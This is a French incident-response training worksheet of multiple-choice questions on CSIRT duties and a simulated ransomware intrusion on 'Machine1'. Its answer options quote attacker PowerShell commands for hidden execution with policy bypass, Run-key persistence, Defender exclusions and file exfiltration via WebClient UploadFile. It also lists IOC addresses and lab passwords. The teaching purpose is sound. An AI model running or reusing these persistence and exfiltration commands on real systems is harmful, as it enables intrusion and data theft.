WorksheetsPrésentation_FionaP_I-Tracing
Total questions: 35
Worksheet time: 2hrs 10mins
Le CSIRT a pour mission principale de détecter, analyser et répondre aux incidents de sécurité informatique.
Vrai
Faux
Le CSIRT est uniquement chargé de la communication externe avec la presse en cas de cyberattaque.
Vrai
Faux
Le CSIRT peut être impliqué dans des actions de prévention, comme des campagnes de sensibilisation à la cybersécurité.
Vrai
Faux
Quelle est la première action recommandée après avoir été informé que Machine1 est infectée ?
Redémarrer Machine1 pour interrompre l'infection
Isoler Machine1 du réseau pour contenir la menace
Mettre à jour les antivirus sur Machine1
Supprimer les fichiers suspects détectés manuellement
Pourquoi la présence de plusieurs machines non surveillées dans le même VLAN que Machine1 est-elle préoccupante ?
Cela complique la mise à jour des correctifs de sécurité
Le risque de propagation non détectée est plus élevé
Ces machines peuvent ralentir l'analyse de l'antivirus
Elles empêchent le SOC d'agir sur Machine1
Quel vecteur d’infection est utilisé par le groupe EncryptoLOL pour accéder à Machine1 ?
Téléchargement via un site web de streaming
Pièce jointe malveillante dans un e-mail de phishing
Clé USB infectée laissée sur un parking
Vulnérabilité non corrigée dans le navigateur
Quel rôle joue PowerShell dans l’attaque d’EncryptoLOL ?
Il a été utilisé pour supprimer les sauvegardes
Il a servi à exécuter la charge utile après activation d’une macro
Il a permis la communication avec le C2 en HTTPS
Il a désinstallé les antivirus
Quelle technique a permis au malware de se propager à d'autres machines ?
Remote Desktop Protocol (RDP)
SSH Brute Force
Partages réseau via le protocole SMB
DNS Tunneling
Quel indicateur de compromission (IOC) est utilisé pour détecter la communication avec le serveur de commande ?
Le nom de domaine d’un site de streaming
L’adresse IP 185.45.67[.]89
Une URL interne
L’adresse MAC de Machine1
Quels sont les différents types de notifications reçues par Alice Martin le 23/04/2025 entre 08:15 et 10:50 ?
Mise à jour de compte
Notifications de connexion et alertes de sécurité
Notifications de livraisons et achats
Aucune des réponses ci-dessus
Quel email contient une pièce jointe suspecte (docm) et quel est son sujet ?
"Urgent! Vérification de votre compte bancaire"
"Mise à jour de votre identifiant Apple"
"Confirmation de votre paiement"
"Nouvelle politique de télétravail"
Quel est le nom du fichier suspect téléchargé ?
validation_crédit.docm
FinalReview.docm
Feedback.docm
Report_v2.xlsx
Quelle commande a été utilisée pour extraire le fichier joint dans le dossier C:\Temp ?
"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\data.zip'"
"powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command '$payload = [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\alice.martin\Downloads\validation_crédit.docm','C:\Temp');'"
"Get-EventLog -LogName System -Newest 5"
"Test-Connection google.com -Count 2"
Quelle action a été réalisée pour désactiver la sécurité sur la machine d'Alice Martin ?
Désactivation du pare-feu Windows
Désactivation de la surveillance en temps réel, de la protection contre les logiciels malveillants et du scan des scripts dans les préférences de Windows Defender
Suppression des fichiers de log de l'antivirus
Téléchargement et exécution d'un antivirus alternatif
Quelle commande a été utilisée pour garantir que le script malveillant soit exécuté automatiquement au démarrage de la machine ?
"$dlPath = 'C:\Temp\script.ps1'; Invoke-Expression (Get-Content $dlPath -Raw)"
"Add-MpPreference -ExclusionPath 'C:\Users\alice.martin\AppData\Roaming'"
"Start-Process 'C:\Users\alice.martin\AppData\Roaming\update.exe'"
"Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'Updater' -Value 'C:\Temp\script.ps1'"
Quelle commande a été utilisée pour exfiltrer des données depuis la machine d'Alice Martin vers un serveur externe ?
"Get-ChildItem C:\Users\alice.martin\Documents -Recurse | Measure-Object"
"Get-Command Get-Process"
"(New-Object System.Net.WebClient).UploadFile('4W3i2hguUU7u4VXoby6tK22cszwNjV883sxPsjvybVcYYTtJD2b', 'C:\Temp\data.zip')"
"Compress-Archive -Path 'C:\Users\alice.martin\Documents\*' -DestinationPath 'C:\Temp\data.zip'"
Quel fichier malveillant a été téléchargé et quelle commande a été utilisée pour le télécharger ?
"Un fichier nommé update.exe, téléchargé via DownloadFile."
"Un fichier zip contenant des données personnelles, téléchargé avec Compress-Archive."
"Un script Powershell nommé script.ps1, téléchargé via Invoke-Expression."
"Un programme de nettoyage téléchargé depuis un serveur interne."
Après avoir téléchargé update.exe, à quelle heure a-t-il été exécuté sur Machine1 ?
2025-04-23T08:54:13
2025-04-23T08:54:10
2025-04-23T08:54:15
2025-04-23T08:55:10
Quel utilisateur a accédé à la fois aux serveurs \\server1\finance et \\server2\backup dans un laps de temps très court ?
mary.johnson
john.doe
alice.martin
george.white
Quelles actions ont été effectuées par Alice Martin à 08:44:00 ?
Déconnexion du serveur finance
Suppression du fichier update.exe
Copie de fichiers des partages vers son dossier personnel
Ouverture d’un document PDF
À quel moment update.exe est-il apparu sur les serveurs ?
08:43:56
08:44:00
08:54:20
08:55:45
Que fait Alice Martin immédiatement après avoir copié update.exe sur les serveurs ?
Elle accède aux fichiers update.exe sur les deux serveurs
Elle se déconnecte sans action
Elle supprime les fichiers ZIP
Elle exécute un script PowerShell
Parmi les affirmations suivantes, laquelle décrit le mieux l’ensemble de ses actions ?
Alice Martin a tenté de restaurer une sauvegarde
Alice Martin a copié des fichiers à des fins de sauvegarde
Alice Martin a agi en tant qu’administratrice réseau légitime
Alice Martin a exfiltré des données et propagé le ransomware sur les serveurs
Plusieurs IP apparaissent de façon récurrente dans les logs Pare-Feux de la machine 10.1.1.10. Parmi les suivantes, lesquelles méritent une investigation plus poussée (Plusieurs choix possibles) ?
MDP: FW_9835
212.192.246.12
185.129.62.62
13.107.4.50
20.42.75.21
Parmi les trois IPs identifiées précédemment dans les logs DNS, laquelle semble être associée à un domaine non connu ? (MDP: DNS_3872)
212.192.246.12
185.129.62.62
20.42.75.21
Aucune des réponses
Quel est ce domain ?
Quel est le type de requête HTTP envoyée à l'URL 'https://www.supportcenter-files.com/upload' ?
(MDP: PROXY_4564)
GET
POST
DELETE
PUT
A quelle étape de l'attaque cette action semble correspondre ?
exfiltration
accès initial
téléchargement du ransomware
élévation de privilèges
Quel fichier est téléchargé depuis le domaine supportcenter-files.com ?
Quel est le code de statut HTTP retourné lors de la requête GET pour télécharger le fichier 'update.exe' ?
404
200
403
500
Quel est le score de confiance en matière d'abus associés à l'IP 185.129.62.62 sur AbuseIPDB ?
70%
10%
100%
7%
Depuis combien de temps cette IP a-t-elle été signalée ?
Moins de 1 mois
Moins de 6 mois
Plus de 1 an
Plus de 2 ans
Quels sont les ports ouverts sur l'IP 185.129.62.62 selon Shodan ?
9001
123
2200
9030
Tous les ports mentionnés
Quel est le fournisseur d'Internet associé à l'IP selon VirusTotal ?
Amazon
Zencurity
OVH
Quelle information importante peut-on déduire du WHOIS de l’IP 185.129.62.62 ? (Partie "Détails" dans VirusTotal)
L’IP appartient à un fournisseur cloud américain, L’IP est utilisée pour héberger des services de streaming
L’IP appartient à une entreprise danoise qui héberge des serveurs Tor
L’IP est associée à un service de messagerie chiffrée allemand
